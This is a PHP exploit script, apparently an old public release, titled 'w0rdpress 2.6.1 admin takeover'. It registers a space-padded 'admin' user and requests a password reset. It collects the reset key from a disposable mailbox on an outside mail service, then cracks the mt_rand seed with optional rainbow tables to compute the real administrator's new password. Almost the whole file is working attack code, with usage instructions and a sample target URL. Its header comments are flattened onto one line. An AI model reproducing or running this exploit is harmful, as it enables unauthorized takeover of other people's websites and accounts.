#!/usr/bin/php =5.2.1 you'll need to be as well, in case # server is <5.2.1, your php also needs to be below. # to make sure it works you'll need the exact same version! # also, mod_php works better than (f)cgi.. # (this is a first working version - not a very reliable one) # # you should create rainbow tables to make this work in a # real world scenario: # php-5.2.0/php createtables.php > wp261_php520 # php-5.2.1/php createtables.php > wp261_php521 # #------------------------------------------------------------- $BLOG = $_SERVER['argv'][1]; echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n"; if(!$BLOG) { echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n"; echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n"; exit; } $UA = "WordpressAdminTakeover"; $MBOX="wp".`ps|md5sum|head -c 8`; $EMAIL="$MBOX@nospamfor.us"; echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ? "[X] rainbow tables available\n" : "[!] rainbow tables not found - this will be really slow\n"; set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",20); if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) { die("[!] $BLOG is no valid URL\n"); } $HOST = $match[1]; $PATH = $match[2]; if(!$PATH) $PATH='/'; echo "[-] registering new admin user\n"; $suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n"); $data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL"; $req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data; fputs($suck, $req); sleep(1); fclose($suck); echo "[-] requesting resetlink and mail to '$EMAIL'\n"; $suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n"); $data="user_login=$EMAIL&wp-submit=Get+New+Password"; $req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n"; fputs($suck, $req); echo "[.] giving $BLOG some time to deliver mail..\n"; for($i=0;$i<8;$i++) { fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n"); sleep(2); } echo "[-] fetching resetlink token $MBOX\n"; $PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us"); if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n"); $MAILID=$match[1]; echo "[-] fetching resetmail $MAILID\n"; $WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX"); if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n"); $KEY=$match[1]; echo "[X] found resetkey $KEY\n"; echo "[-] resetting password\n"; $req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n"; fputs($suck, $req); while(!feof($suck)) { #echo "D:". fgets($suck); } fclose($suck); echo "[-] calculating password\n"; $SEED=false; if(file_exists('wp261_php520')) { $SEED=`grep -F $KEY wp261*|cut -d : -f 1`; echo "[X] got seed $SEED from rainbow table\n"; } $PASSWORD=calcpass($KEY, $SEED); echo "[X] all done."; exit; function calcpass($resetkey, $seed = false) { mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand(); define('BUGGY', $a == $b); echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." mode\n"; echo "[+] got key $resetkey via mail\n"; if(!$seed) $seed = getseed($resetkey); if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n"); mt_srand($seed); echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n"; $pass = wp_generate_password(); echo "[+] new credentials are admin:$pass\n"; return $pass; } function wp_generate_password($length = 12, $special_chars = true) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; if ( $special_chars ) $chars .= '!@#$%^&*()'; $password = ''; for ( $i = 0; $i < $length; $i++ ) $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1); return $password; } function getseed($resetkey) { echo "[-] calculating rand seed for $resetkey (this will take a looong time)"; $max = pow(2,(32-BUGGY)); for($x=0;$x<=$max;$x++) { $seed = BUGGY ? ($x << 1) + 1 : $x; mt_srand($seed); $testkey = wp_generate_password(20,false); if($testkey==$resetkey) { echo "o\n"; return $seed; } if(!($x % 10000)) echo "."; } echo "\n"; return false; } ?>